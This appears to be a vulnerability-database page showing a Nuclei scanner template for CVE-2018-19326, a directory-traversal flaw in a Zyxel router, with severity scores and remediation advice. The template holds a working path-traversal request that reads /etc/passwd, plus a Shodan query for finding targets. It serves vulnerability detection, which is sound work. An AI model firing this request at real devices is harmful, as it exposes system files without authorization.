Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-19326
HistoryMay 11, 2022 - 11:04 p.m.

Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion

2022-05-1123:04:44
ProjectDiscovery
github.com
3

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.008 Low

EPSS

Percentile

81.7%

Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files.
id: CVE-2018-19326

info:
  name: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system.
  remediation: |
    Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/45904
    - https://www.cybersecurity-help.cz/vdb/SB2018120309
    - https://www.zyxel.com/homepage.shtml
    - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19326
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-19326
    cwe-id: CWE-22
    epss-score: 0.01158
    epss-percentile: 0.83304
    cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zyxel
    product: vmg1312-b10d_firmware
    shodan-query: http.html:"VMG1312-B10D"
  tags: cve2018,cve,lfi,modem,router,edb,zyxel

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.008 Low

EPSS

Percentile

81.7%

Related for NUCLEI:CVE-2018-19326